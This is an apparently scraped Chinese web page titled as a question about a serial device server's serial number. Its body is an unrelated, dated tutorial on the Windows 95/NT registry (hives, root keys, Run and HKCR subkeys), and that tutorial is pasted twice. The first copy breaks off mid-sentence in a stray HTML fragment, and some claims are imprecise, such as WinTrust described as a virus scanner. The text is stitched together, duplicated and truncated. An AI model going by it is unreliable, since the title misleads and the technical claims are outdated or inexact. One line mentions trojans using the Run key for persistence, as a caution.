如何查看串口伺服器序列號
⑴ 注冊表到底是什麼
什麼是注冊表?
注冊表因為它復雜的結構和沒有任何聯系的CLSID鍵使得它可能看上去很神秘。不幸的是,微軟並沒有完全公開講述關於注冊表正確設置的支持信息,這樣使得注冊表看上去更不可琢磨。處理和編輯注冊表如同「黑色藝術」一樣,它在系統中的設置讓用戶感覺象在黑暗中摸索一樣找不到感覺。這樣,因為用戶對這方面的缺乏了解使得注冊表更多的出現故障。
Windows注冊表是幫助Windows控制硬體、軟體、用戶環境和Windows界面的一套數據文件,注冊表包含在Windows目錄下兩個文件system.dat和user.dat里,還有它們的備份system.da0和user.da0。通過Windows目錄下的regedit.exe程序可以存取注冊表資料庫。在以前,在windows的更早版本(在win95以前),這些功能是靠win.ini,system.ini和其他和應用程序有關聯的.ini文件來實現的.
在windows操作系統家族中,system.ini和win.ini這兩個文件包含了操作系統所有的控制功能和應用程序的信息,system.ini管理計算機硬體而win.ini管理桌面和應用程序。所有驅動、字體、設置和參數會保存在.ini文件中,任何新程序都會被記錄在.ini文件中。這些記錄會在程序代碼中被引用。因為受win.ini和system.ini文件大小的限制,程序員添加輔助的.INI文件以用來控制更多的應用程序。舉例來說,微軟的Excel有一個excel.ini文件,它包含著選項、設置、預設參數和其他關繫到Excel運行正常的信息。在system.ini和win.ini中只需要指出excel.ini的路徑和文件名即可。
最開始,system.ini和win.ini控制著所有windows和應用程序的特徵和存取方法,它在少數的用戶和少數應用程序的環境中工作的很好。隨著應用程序的數量和復雜性越來越大,則需要在.ini文件中添加更多的參數項。這樣下來,在一個變化的環境中,在應用程序安裝到系統中後,每個人都會更改.ini文件。然而,沒有一個人在刪除應用程序後刪除.ini文件中的相關設置,所以system.ini和win.ini這個兩個文件會變的越來越大。每增加的內容會導致系統性能越來越慢。而且每次應用程序的升級都出現這樣的難題:升級會增加更多的參數項但是從來不去掉舊的設置。而且還有一個明顯的問題,一個.ini文件的最大尺寸是64KB。為了解決這個問題,軟體商自己開始支持自己的.ini文件,然後指向特定的ini文件如win.ini和system.ini文件。這樣下來多個.ini文件影響了系統正常的存取級別設置。如果一個應用程序的.ini文件和WIN.INI文件設置起沖突,究竟是誰的優先順序更高呢?
注冊表最初被設計為一個應用程序的數據文件相關參考文件,最後擴展成對於32位操作系統和應用程序包括了所有功能下的東東.注冊表是一套控制操作系統外表和如何響應外來事件工作的文件。這些「事件」的范圍從直接存取一個硬體設備到介面如何響應特定用戶到應用程序如何運行等等。注冊表因為它的目的和性質變的很復雜,它被設計為專門為32位應用程序工作,文件的大小被限制在大約40MB。
注冊表都做些什麼?
注冊表是為Windows NT和Windows95中所有32位硬體/驅動和32位應用程序設計的數據文件。16位驅動在Winnt下無法工作,所以所有設備都通過注冊表來控制,一般這些是通過BIOS來控制的。在Win95下,16位驅動會繼續以實模式方式設備工作,它們使用system.ini來控制。16位應用程序會工作在NT或者Win95 下,它們的程序仍然會參考win.ini和system.ini文件獲得信息和控制。
在沒有注冊表的情況下,操作系統不會獲得必須的信息來運行和控制附屬的設備和應用程序及正確響應用戶的輸入。
在系統中注冊表是一個記錄32位驅動的設置和位置的資料庫。當操作系統需要存取硬體設備,它使用驅動程序,甚至設備是一個BIOS支持的設備。無BIOS支持設備安裝時必須需要驅動,這個驅動是獨立於操作系統的,但是操作系統需要知道從哪裡找到它們,文件名、版本號、其他設置和信息,沒有注冊表對設備的記錄,它們就不能被使用。
當一個用戶准備運行一個應用程序,注冊表提供應用程序信息給操作系統,這樣應用程序可以被找到,正確數據文件的位置被規定,其他設置也都可以被使用。
注冊表保存關於預設數據和輔助文件的位置信息、菜單、按鈕條、窗口狀態和其他可選項。它同樣也保存了安裝信息(比如說日期),安裝軟體的用戶,軟體版本號和日期,序列號等。根據安裝軟體的不同,它包括的信息也不同。
然而,一般來說,注冊表控制所有32位應用程序和驅動,控制的方法是基於用戶和計算機的,而不依賴於應用程序或驅動,每個注冊表的參數項控制了一個用戶的功能或者計算機功能。用戶功能可能包括了桌面外觀和用戶目錄。所以,計算機功能和安裝的硬體和軟體有關,對所以用戶來說項都是公用的。
有些程序功能對用戶有影響,有些時作用於計算機而不是為個人設置的,同樣的,驅動可能是用戶指定的,但在很多時候,它們在計算機中是通用的。
注冊表控制用戶模式的例子有:
控制面板功能;
桌面外觀和圖標;
網路參數;
瀏覽器功能性和特徵;
那些功能中的某些是和用戶無關的,有些是針對用戶的。
計算機相關控制項基於計算機名,和登陸用戶無關。控制類型的例子是安裝一個應用程序,不管是哪個用戶,程序的可用性和存取是不變的,然而,運行程序圖標依賴於網路上登陸的用戶。網路協議可用性和優先權基於計算機,但是當前連接和用戶信息相關。
這里是在注冊表中基與計算機控制條目的一些例子:
存取控制;
登陸確認;
文件和列印機共享;
網卡設置和協議;
系統性能和虛擬內存設置;
沒有了注冊表,Win95和Winnt 就不太可能存在。它們實在太復雜了,以致於用過去的.ini文件無法控制,它們的擴展能力需要幾乎無限制的安裝和使用應用程序,注冊表實現了它。然而,注冊表比.ini文件更復雜,理解它如何工作,它做什麼和如何用它來做是有效管理系統的關鍵。
在系統中注冊表控制所有32位應用程序和它們的功能及多個應用程序的交互,比如復制和粘貼,它也控制所有的硬體和驅動程序。雖然多數可以通過控制面板來安裝和設置,理解注冊表仍是做Winnt和Win95系統管理基本常識。
二、注冊表的結構
注冊表的結構
注冊表是Windows程序員建造的一個復雜的信息資料庫,它是多層次式的。在不同系統上注冊表的基本結構相同。其中的復雜數據會在不同方式上結合,從而產生出一個絕對唯一的注冊表。
計算機配置和預設用戶設置的注冊表數據在Winnt中被保存在下面這五個文件中:
DEFAULT,SAM,SECURITY,SOFTWARE,SYSTEM,NTUSER.DAT。
Win95中所有系統注冊信息保存在windows目錄下的SYSTEM.DAT文件里。所有硬體設置和軟體信息也保存在這個文件。它要比NT注冊表文件簡單的多,因為這里並不需要更多的控制。Win95被設計為一個網路的客戶或者單獨工作的系統,所以用戶控制或者安全級別和NT不一樣。這使得Win95注冊表工作比NT更容易,所以這個文件也比較小。
Win95用戶的注冊數據一般被保存在windows目錄下的user.dat里。如果你在控制面板|密碼|用戶配置文件中創建並使用多於一個用戶的配置文件,每個用戶就會有在\WINDOWS\Profiles\username\USER.DAT下它自己的user.dat文件。在啟動時,系統將記錄你的登陸,從你目錄中的配置文件(USER.DAT信息)將被裝入,以用來保持你自己的桌面和圖標。
控制鍵
在注冊表編輯器中注冊表項是用控制鍵來顯示或者編輯的。控制鍵使得找到和編輯信息項組更容易。因此,注冊表使用這些條目。下面是六個控制鍵
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_USERS
HKEY_CURRENT_USER
Winnt和Win95的注冊表並不兼容。從Win95向Winnt升級需要你重新安裝32位應用程序,重新在桌面上創建圖標,並重新建立用戶環境。
通過控制鍵可以比較容易編輯注冊表。雖然它們顯示和編輯好象獨立的鍵,其實HKEY_CLASSES_ROOT 和HKEY_CURRENT_CONFIG是 HKEY_LOCAL_MACHINE的一部分。HKEY_CURRENT_USER是HKEY_USERS的一部分。
HKEY_LOCAL_MACHINE包含了HKEY_CLASSES_ROOT和HKEY_CURRENT_CONFIG的所有內容。每次計算機啟動時,HKEY_CURRENT_CONFIG和HKEY_CLASSES_ROOT的信息被映射用以查看和編輯。
HKEY_CLASSES_ROOT其實就是HKEY_LOCAL_MACHINE\SOFTWARE\Classes,但是在HKEY_CLASSES_ROOT窗編輯相對來說顯得更容易和有條理。
HKEY_USERS保存著預設用戶信息和當前登陸用戶信息。當一個域成員計算機啟動並且一個用戶登陸,域控制器自動將信息發送到HKEY_CURRENT_USER里,而且HKEY_CURRENT_USER信息被映射到系統內存中。其他用戶的信息並不發送到系統,而是記錄在域控制器里。
鍵和子鍵
數據被分割成多層次的鍵和子鍵,建立分層次(就象Exploer一樣)結構更易於編輯。每個鍵有成組的信息而且根據在其中的數據類型被命名。每個鍵在它的文件夾圖標上都有一個加號(+)標志子鍵說明在它下面還有更多內容的東西。當點開它的時候,文件夾的加號標志被替換成一個減號(-)標志,然後顯示出下一級的子鍵。
所有軟體,硬體,windows工作的設置都存放在HKEY_LOCAL_MACHINE。所有安全策略,用戶許可權和共享信息也包括在這個鍵中。用戶許可權,安全策略,共享信息可以通過Windows NT域用戶管理器,Explorer和Win95中控制面板來設置。
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT包含了所有應用程序運行時必需的信息:
在文件和應用程序之間所有的擴展名和關聯;
所有的驅動程序名稱;
類的ID數字(所要存取項的名字用數字來代替);
DDE和OLE的信息;
用於應用程序和文件的圖標;
HKEY_CURRENT_CONFIG.
HKEY_CURRENT_CONFIG是在HKEY_LOCAL_MACHINE中當前硬體配置信息的映射。如果系統只有一個配置文件,也就是原始配置,數據將一直在同樣的地方。在控制面板|系統|硬體配置文件|創建一個額外的配置使額外配置信息放入HKEY_LOCAL_MACHINE。當Win95中存在多個配置文件時,當每次計算機啟動時將給出一個提示讓你選擇一個配置文件。在Winnt中,在啟動時你可以按空格鍵來選擇上次正常啟動時硬體配置文件。根據硬體配置文件選擇的不同,特定的信息被映射到HKEY_CURRENT_CONFIG。
HKEY_DYN_DATA
HKEY_DYN_DATA和其他的注冊表控制鍵不同,因為實際上它並不被寫入硬碟驅動器中。Win95的一個優點是,在系統啟動時HKEY_DYN_DATA這個控制鍵儲存收集到的即插即用信息並配置它們。它保存在內存中,Win95用它來控制硬體。因為是在內存中,所以它不從硬碟中讀取,每次當你啟動計算機時,配置都有可能會不一樣。在啟動時Win95必須計算超過1600種可能的配置。所以,如果系統改變既定的設置而沒有報告給Win95那麼潛在的問題就可能發生。系統大多數時間工作良好,但是並非一直如此。
HKEY_USERS
HKEY_USERS僅包含了預設用戶設置和登陸用戶的信息。雖然它包含了所有獨立用戶的設置,但在用戶未登陸網路時用戶的設置是不可用的。這些設置告訴系統哪些圖標會被使用,什麼組可用,哪個開始菜單可用,哪些顏色和字體可用,和控制面板上什麼選項和設置可用。
HKEY_CURRENT_USER
用來保存當前用戶和預設用戶的信息,HKEY_CURRENT_USER僅映射當前登陸用戶的信息。
各主鍵的簡單介紹
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE是一個顯示控制系統和軟體的處理鍵。HKLM鍵保存著計算機的系統信息。它包括網路和硬體上所有的軟體設置。(比如文件的位置,注冊和未注冊的狀態,版本號等等)這些設置和用戶無關,因為這些設置是針對使用這個系統的所有用戶的。
HKEY_LOCAL_MACHINE\AppEvents
為了以後在瘦客戶機上運行客戶機/伺服器這樣的應用程序,在Win95/98中AppEvents鍵是空的。應用程序實際上都駐留網路伺服器上,這些鍵會保存部分指針。
HKEY_LOCAL_MACHINE\Config
這個鍵保存著你計算機上所有不同的硬體設置(這些從控制面板的系統屬性中硬體配置文件中可以創建)。這些配置在啟動時通常被復制到HKCC。每個配置會被用一個鍵(比如0001或者0002等等)來保存,每個都是一個獨立的配置。如果你只有一個單一的配置,那就只會有0001這個鍵
HKEY_LOCAL_MACHINE\Config\0001\Display
這個鍵表示顯示的設置,如熒屏字體,窗體大小,窗體位置和解析度等
一個小技巧:當設置了計算機不支持的大解析度導致Windows不能啟動時(黑屏),可以修改解析度來解決。進入安全模式,運行regedit.exe,在這個鍵的Resolution鍵值中把數據值修改為640,480或者800,600這樣的低解析度,然後重新啟動計算機即可。
HKEY_LOCAL_MACHINE\Config\0001\System
這個鍵保存著系統里列印機的信息
HKEY_LOCAL_MACHINE\Config\0001\System\CurrentControlSet\Control\Print\Printers
在這個鍵下面,有一個鍵是為系統上每一個列印機設置的,通過控制面板添加和刪除列印機會調整這個列表
HKEY_LOCAL_MACHINE\Enum
Enum鍵包含啟動時發現的硬體設備和那些既插即用卡的信息。Win95使用匯流排列舉在啟動時通過不同的.ini文件來檢測硬體信息。那些在啟動時被安裝的和被檢測到的硬體會顯示在這里。子鍵包括BIOS, ESDI, FLOP, HTREE, ISAPNP, Monitor, Network, Root, SCSI, 和 VIRTUAL。子鍵名表示它們各自的硬體設備信息。
HKEY_LOCAL_MACHINE\Enum\BIOS
BIOS鍵保存著系統中所有即插即用設備的信息。它們用一套代碼數列出,包括每一個鍵的詳細說明,舉例,*pnp0400是並行口LPT1的鍵。如果LPT1並不具備即插即用功能,它就會別列入到Enum下的Root鍵中
HKEY_LOCAL_MACHINE\Enum\Root
Root鍵包括所有非即插即用設備的信息。在這里,我們可以迅速斷定哪些設備是即插即用,那些不是。比如SCSI適配器,這個設備必須符合Win95中一個鍵名為ForcedConfig的硬體設置,這個不會改變。
HKEY_LOCAL_MACHINE\Enum\Network
win95的網路功能在這個鍵有詳細說明,子鍵包括了每個已經安裝的主要的服務和協議。
HKEY_LOCAL_MACHINE\HARDWARE
hardware子鍵包括了兩個多層的子鍵:DESCRIPTION鍵,它包含了中央處理器和一個浮點處理器的信息。還有一個設備映射鍵,它下面的串列鍵列出你所有的com埠。這個hardware鍵僅保存超級終端程序的信息,及數學處理器和串列口。
HKEY_LOCAL_MACHINE\Network
這個鍵僅保存網路登陸信息。所有網路服務細節都保存在HKEY_LOCAL_MACHINE\Enum\Network這個鍵中。這個鍵有一個子鍵,logon,包括了lmlogon(本地機器登陸?0=false 1=true)的值,logonvalidated(必須登陸驗證),策略處理,主登陸方式(Windows登陸 ,微軟網路客戶方式等),用戶名和用戶配置。
HKEY_LOCAL_MACHINE\SECURITY
security 有兩個子鍵,第一個是存取(它最終致使一個遠程鍵列出網路安全資源,存取許可權等)和提供(包括列出網路地址和地址伺服器),這個鍵被保留用在以後使用高級安全功能和NT兼容性上
HKEY_LOCAL_MACHINE\SOFTWARE
這個鍵列出了所有已安裝的32位軟體和程序的.ini文件。它包括了變化,依靠軟體安裝。那些程序的控制功能在這里的子鍵中列出。多數子鍵簡單的列出了安裝軟體的版本號。
我們在\Microsoft\Windows\Current Version下發現了一些有意思的設置,它有如下子鍵:
1.App paths: 你曾經安裝過的所有32位軟體的位置。
2.Applets, Compression, Controls Folder : 包括下控制面板象顯示屬性那樣屬性條的附件。
3.Detect, explorer :很多有意思的子鍵如Namespace keys of Desktop和My Computer----它們指出了回收站和撥號網路的CLSID行----和提示子鍵可以讓你建立自己的提示。
4.Extensions : 一個擴展聯系的列表,當前相關聯的擴展名和比特定的執行文件更適合的目標類型。
5.Fonts, fontsize, FS Templates :系統屬性條中所選擇文件系統模板, 伺服器,桌面計算機或者筆記本電腦信息。
6.MS-DOS Emulation :包括一個應用程序兼容子鍵 為大量過時的程序二進制鍵所設。
7.MS-DOS Options :在dos模式下的設置,如himem.sys,cd-roms等。
8.Network :網路驅動的配置。
9.Nls, Policies :系統管理員認為你不應該去做的事。
10.ProfileList :所有可以登陸你計算機的用戶名列表。
11.在Windows啟動時運行的程序的神秘之處是它們並不在開始菜單的啟動文件夾中。它們在HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\下的子鍵中被執行。
Run : 程序在啟動時運行
RunOnce : windows初始化時程序在啟動時只運行一次,這個經常用在當安裝軟體之後需要重新啟動系統的時候,所以這個鍵一般都是空的。
RunServices : 它就象Run一樣,但是包含了「服務」,它不象一般的程序它們是比較重要的或者是「系統」程序。但是它們不是VXDs,就象McAfee或者RegServ工作一樣。
RunServicesOnce : 它只運行一次,但是是「系統自身」的安裝(大量的windows安裝參數:通常鍵值包括了系統目錄位置,和win95更新,可選項安裝組件,和windows啟動目錄的子鍵。
注意:在很多黑客木馬軟體中,常常在這里添加鍵值(一般是在Run中),這樣使得木馬軟體可以隨著windows啟動而啟動並且很隱秘。在這里可以查看不正常的啟動項和去掉無用的運行程序(比如我就很不喜歡超級解霸的自動伺服器,在這里可以去掉它)。
12.SharedDLLs:共享DLL的列表,每一個都給出了在一個不可知系統的一個數字等級。
13.Shell Extensions:列出了「被認可的」OLE注冊條,和相應的CLSID連接。
14.ShellScrap :這個包含了一個PriorityCacheformats的子鍵,它包括了一個空的有限值,它更象過去SmartDrive命令行參數的派生。
15.Time Zones : 主鍵值是你現在的時區;子鍵定義了所以可能的時區。
16.Uninstall:這個保存了程序在添加/刪除程序對話框的顯示;子鍵包含了指向反安裝程序的路徑。和安裝向導相似.......)winlogon(包含了合法登陸布告的文本句)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
這個子鍵包括設備驅動和其他服務的描述和控制。不同於windows nt,win95隻包括限制驅動的控制設置信息。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
這個子鍵包括了win95控制面板中的信息。不要編輯這些信息,因為一些小程序的改變在很多地方,一個丟失的項會使這個系統變的不穩定
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
這個鍵包括了所有win95的標准服務。所有被添加的服務和設備,每個標準的服務鍵包括了它的設置和辨認設置。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Arbitrators
atbitrators鍵包括了當兩個設備共同佔用同樣的設置需要解決的信息。四個子鍵包括了內存地址,沖突,DMA,I/O埠沖突和IRQ沖突。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Class
class鍵包括了所有win95支持的設備classes控制,這些和你在添加新硬體出現的硬體組很類似,還包括了這些設備如何安裝的信息。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\inetaccs
這個鍵包括了關於這個系統變化的ie附件的可用性,它僅在你安裝過ie2。0或者更高版本才出現。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSNP32
msnp32描述了客戶機如何在microsoft網路中實現功能,它包括了認證過程和認證者的信息。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NWNP32
nenp32鍵描述了windows客戶如何在netware網路中工作功能,它包括了關於認證過程和證明者的信息。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess
在這個鍵里包括需要遠程工作在win95系統上的信息,有認證參數,主機信息,和為了建立一個撥號連接工作的協議信息。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP
這個鍵包括了所以snmp(簡單網路管理協議)的參數。它包括了允許的管理,配置陷阱,和有效的團體。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VxD
vxd鍵包括了win95中所有32位虛擬設備驅動信息,win95自動管理它們,所以不必要用注冊表編輯器編輯它們,所以的靜態vxds用子鍵列出。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WebPost
webpost鍵包括了所有裝載的internet郵局的設置,如果你連接一個isp,並且它列出載這里,你應該給自己選則一個伺服器。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsock
這個鍵列出了當連接到internet上winnsock文件的信息,如果列出了不正確的文件,你將不會連接上internet。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinTrust
wintrust功能是檢查從Internet上下載來的文件是否有病毒,它可以確保你得到干凈安全的文件。
HKEY_CLASSES_ROOT
在注冊表中HKEY_CLASSES_ROOT是系統中控制所有數據文件的項。這個在Win95和Winnt中是相通的。HKEY_CLASSES_ROOT控制鍵包括了所有文件擴展和所有和執行文件相關的文件。它同樣也決定了當一個文件被雙擊時起反應的相關應用程序。
HKEY_CLASSES_ROOT被用作程序員在安裝軟體時方便的發送信息,在Win95和Winnt中,HKEY_CLASSES_ROOT和HKEY_LOCAL_MACHINE\Software\Classes是相同的。程序員在運行他們的啟動程序時不需要擔憂實際的位置,相反的,他們只需要在HKEY_CLASSES_ROOT中加入數據就可以了。
在Windows用戶圖形界面下,每件事----每個文件,每個目錄,每個小程序,每個連接,每個驅動---都被看做一個對象;每個對象都有確定的屬性和它聯系。HKCR包含著對象類型和它們屬性的列表。HKCR主要的功能被設置為:
一個對象類型和一個文件擴展名關聯
一個對象類型和一種圖標關聯
一個對象類型和一個命令行動作的關聯
定義對象類型相關菜單選項和定義每一個對象類型屬性選項
在Win95中,相關菜單就是當你滑鼠右擊一個對象時所彈出的菜單;屬性就是當你選擇屬性項後一個展開的對話框。用簡單術語來說就是在改變HKCR中的設置可以改變一個給定文件擴展名預設的關聯。改變一個文件類型的預設圖標,和添加或者刪除給定對象類型的彈出菜單內容(或者所有的對象類型)
HKCR包括了三種基本類型的子鍵
\??? 或者文件擴展名子鍵
文件擴展名子鍵在彈出菜單上連接文件擴展名到對象類型和相關操作,屬性項,和相關操作。
\object 類型子鍵
對象類型子鍵定義了一個對象類型在它預設圖標的項,它的彈出菜單和屬性項,它的相關操作和它的CLSID連接。
\CLSID 子鍵
在Windows下每件事都被用一個數字取代它的名字來對待。就象人往往是用名字來處理事情一樣。CLSID是標識所有列出的圖標,應用程序,目錄,文件類型等等對象的數字。是微軟為製造商分配的,每一個都必須是唯一的。製造商將CLSID放入安裝程序文件這樣就可以在安裝時更新注冊表。
注冊表是應用程序進行時它們需要關於做什麼的指示的資料庫。比如說,假定你有一個微軟Excel 7電子數據表的Word 7文檔,當你在Word中雙擊這個電子數據表,應用程序菜單就會變成Excel的菜單而且電子數據表進入編輯狀態,就好象你在Excel中一樣。它是如何知道該做什麼呢?每個Excel 7創建的文件都有Excel的CLSID連接。Word讀這個CLSID後,到注冊表中尋找指示,依賴CLSID下的數據運行.DLL文件或者應用程序。
CLSID子鍵為對象類型提供了OLE和DDE信息和圖標。相關菜單,或者包含在它子鍵中的屬性項信息。這個可能是多數讓人看到後覺得「恐怖」的鍵。每個CLSID數必須是唯一的,實際上,為了這個目的微軟已經出產了CLSID-產生程序--這個結果導致你往往得到32位16進制的數字串,除非你是程序員,否則多數部分鍵看起來是很枯燥的。它們包括內存管理模式,客戶機/伺服器配置,和OLE處理的.dll連接。
關於子鍵的一點註解
1)shell:Shell鍵有個一」action「子鍵,如同」open「一樣,這里有一個command子鍵;command子鍵有一個預設句值,它包含了運行程序的命令行。將一個」open「子鍵放在一個對象類型的shell子鍵中會在這個對象類型的彈出菜單上多出一個」open「選項,給這個open子鍵一個command(預設命令行"C:\Windows \Notepad.exe %1")子鍵會使得打開這個對象類型時使用筆記本做為預設應用程序。其他操作選項包括View,Print,Copy,Virus,Scan等等。
2)shellex:Shellex鍵有一個子鍵。它們包含的每一個子鍵指向一個為對象類型執行OLE和DDE功能的CLSID項(比如說快速查看,一個菜單處理子鍵下指向一個有句值的CLSID鍵列出了包含了文件瀏覽功能的.dll文件)
3)shellnew:ShellNew包含了一個「command」句,它包含了一個打開對象類型「新」文件的命令行。
4)DefaultIcon:DefaultIcon子鍵包含了一個「default」句,?/div>
⑵ 注冊表是什莫
什麼是注冊表?
注冊表因為它復雜的結構和沒有任何聯系的CLSID鍵使得它可能看上去很神秘。不幸的是,微軟並沒有完全公開講述關於注冊表正確設置的支持信息,這樣使得注冊表看上去更不可琢磨。處理和編輯注冊表如同「黑色藝術」一樣,它在系統中的設置讓用戶感覺象在黑暗中摸索一樣找不到感覺。這樣,因為用戶對這方面的缺乏了解使得注冊表更多的出現故障。
Windows注冊表是幫助Windows控制硬體、軟體、用戶環境和Windows界面的一套數據文件,注冊表包含在Windows目錄下兩個文件system.dat和user.dat里,還有它們的備份system.da0和user.da0。通過Windows目錄下的regedit.exe程序可以存取注冊表資料庫。在以前,在windows的更早版本(在win95以前),這些功能是靠win.ini,system.ini和其他和應用程序有關聯的.ini文件來實現的.
在windows操作系統家族中,system.ini和win.ini這兩個文件包含了操作系統所有的控制功能和應用程序的信息,system.ini管理計算機硬體而win.ini管理桌面和應用程序。所有驅動、字體、設置和參數會保存在.ini文件中,任何新程序都會被記錄在.ini文件中。這些記錄會在程序代碼中被引用。因為受win.ini和system.ini文件大小的限制,程序員添加輔助的.INI文件以用來控制更多的應用程序。舉例來說,微軟的Excel有一個excel.ini文件,它包含著選項、設置、預設參數和其他關繫到Excel運行正常的信息。在system.ini和win.ini中只需要指出excel.ini的路徑和文件名即可。
最開始,system.ini和win.ini控制著所有windows和應用程序的特徵和存取方法,它在少數的用戶和少數應用程序的環境中工作的很好。隨著應用程序的數量和復雜性越來越大,則需要在.ini文件中添加更多的參數項。這樣下來,在一個變化的環境中,在應用程序安裝到系統中後,每個人都會更改.ini文件。然而,沒有一個人在刪除應用程序後刪除.ini文件中的相關設置,所以system.ini和win.ini這個兩個文件會變的越來越大。每增加的內容會導致系統性能越來越慢。而且每次應用程序的升級都出現這樣的難題:升級會增加更多的參數項但是從來不去掉舊的設置。而且還有一個明顯的問題,一個.ini文件的最大尺寸是64KB。為了解決這個問題,軟體商自己開始支持自己的.ini文件,然後指向特定的ini文件如win.ini和system.ini文件。這樣下來多個.ini文件影響了系統正常的存取級別設置。如果一個應用程序的.ini文件和WIN.INI文件設置起沖突,究竟是誰的優先順序更高呢?
注冊表最初被設計為一個應用程序的數據文件相關參考文件,最後擴展成對於32位操作系統和應用程序包括了所有功能下的東東.注冊表是一套控制操作系統外表和如何響應外來事件工作的文件。這些「事件」的范圍從直接存取一個硬體設備到介面如何響應特定用戶到應用程序如何運行等等。注冊表因為它的目的和性質變的很復雜,它被設計為專門為32位應用程序工作,文件的大小被限制在大約40MB。
注冊表都做些什麼?
注冊表是為Windows NT和Windows95中所有32位硬體/驅動和32位應用程序設計的數據文件。16位驅動在Winnt下無法工作,所以所有設備都通過注冊表來控制,一般這些是通過BIOS來控制的。在Win95下,16位驅動會繼續以實模式方式設備工作,它們使用system.ini來控制。16位應用程序會工作在NT或者Win95 下,它們的程序仍然會參考win.ini和system.ini文件獲得信息和控制。
在沒有注冊表的情況下,操作系統不會獲得必須的信息來運行和控制附屬的設備和應用程序及正確響應用戶的輸入。
在系統中注冊表是一個記錄32位驅動的設置和位置的資料庫。當操作系統需要存取硬體設備,它使用驅動程序,甚至設備是一個BIOS支持的設備。無BIOS支持設備安裝時必須需要驅動,這個驅動是獨立於操作系統的,但是操作系統需要知道從哪裡找到它們,文件名、版本號、其他設置和信息,沒有注冊表對設備的記錄,它們就不能被使用。
當一個用戶准備運行一個應用程序,注冊表提供應用程序信息給操作系統,這樣應用程序可以被找到,正確數據文件的位置被規定,其他設置也都可以被使用。
注冊表保存關於預設數據和輔助文件的位置信息、菜單、按鈕條、窗口狀態和其他可選項。它同樣也保存了安裝信息(比如說日期),安裝軟體的用戶,軟體版本號和日期,序列號等。根據安裝軟體的不同,它包括的信息也不同。
然而,一般來說,注冊表控制所有32位應用程序和驅動,控制的方法是基於用戶和計算機的,而不依賴於應用程序或驅動,每個注冊表的參數項控制了一個用戶的功能或者計算機功能。用戶功能可能包括了桌面外觀和用戶目錄。所以,計算機功能和安裝的硬體和軟體有關,對所以用戶來說項都是公用的。
有些程序功能對用戶有影響,有些時作用於計算機而不是為個人設置的,同樣的,驅動可能是用戶指定的,但在很多時候,它們在計算機中是通用的。
注冊表控制用戶模式的例子有:
控制面板功能;
桌面外觀和圖標;
網路參數;
瀏覽器功能性和特徵;
那些功能中的某些是和用戶無關的,有些是針對用戶的。
計算機相關控制項基於計算機名,和登陸用戶無關。控制類型的例子是安裝一個應用程序,不管是哪個用戶,程序的可用性和存取是不變的,然而,運行程序圖標依賴於網路上登陸的用戶。網路協議可用性和優先權基於計算機,但是當前連接和用戶信息相關。
這里是在注冊表中基與計算機控制條目的一些例子:
存取控制;
登陸確認;
文件和列印機共享;
網卡設置和協議;
系統性能和虛擬內存設置;
沒有了注冊表,Win95和Winnt 就不太可能存在。它們實在太復雜了,以致於用過去的.ini文件無法控制,它們的擴展能力需要幾乎無限制的安裝和使用應用程序,注冊表實現了它。然而,注冊表比.ini文件更復雜,理解它如何工作,它做什麼和如何用它來做是有效管理系統的關鍵。
在系統中注冊表控制所有32位應用程序和它們的功能及多個應用程序的交互,比如復制和粘貼,它也控制所有的硬體和驅動程序。雖然多數可以通過控制面板來安裝和設置,理解注冊表仍是做Winnt和Win95系統管理基本常識。
二、注冊表的結構
注冊表的結構
注冊表是Windows程序員建造的一個復雜的信息資料庫,它是多層次式的。在不同系統上注冊表的基本結構相同。其中的復雜數據會在不同方式上結合,從而產生出一個絕對唯一的注冊表。
計算機配置和預設用戶設置的注冊表數據在Winnt中被保存在下面這五個文件中:
DEFAULT,SAM,SECURITY,SOFTWARE,SYSTEM,NTUSER.DAT。
Win95中所有系統注冊信息保存在windows目錄下的SYSTEM.DAT文件里。所有硬體設置和軟體信息也保存在這個文件。它要比NT注冊表文件簡單的多,因為這里並不需要更多的控制。Win95被設計為一個網路的客戶或者單獨工作的系統,所以用戶控制或者安全級別和NT不一樣。這使得Win95注冊表工作比NT更容易,所以這個文件也比較小。
Win95用戶的注冊數據一般被保存在windows目錄下的user.dat里。如果你在控制面板|密碼|用戶配置文件中創建並使用多於一個用戶的配置文件,每個用戶就會有在\WINDOWS\Profiles\username\USER.DAT下它自己的user.dat文件。在啟動時,系統將記錄你的登陸,從你目錄中的配置文件(USER.DAT信息)將被裝入,以用來保持你自己的桌面和圖標。
控制鍵
在注冊表編輯器中注冊表項是用控制鍵來顯示或者編輯的。控制鍵使得找到和編輯信息項組更容易。因此,注冊表使用這些條目。下面是六個控制鍵
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_USERS
HKEY_CURRENT_USER
Winnt和Win95的注冊表並不兼容。從Win95向Winnt升級需要你重新安裝32位應用程序,重新在桌面上創建圖標,並重新建立用戶環境。
通過控制鍵可以比較容易編輯注冊表。雖然它們顯示和編輯好象獨立的鍵,其實HKEY_CLASSES_ROOT 和HKEY_CURRENT_CONFIG是 HKEY_LOCAL_MACHINE的一部分。HKEY_CURRENT_USER是HKEY_USERS的一部分。
HKEY_LOCAL_MACHINE包含了HKEY_CLASSES_ROOT和HKEY_CURRENT_CONFIG的所有內容。每次計算機啟動時,HKEY_CURRENT_CONFIG和HKEY_CLASSES_ROOT的信息被映射用以查看和編輯。
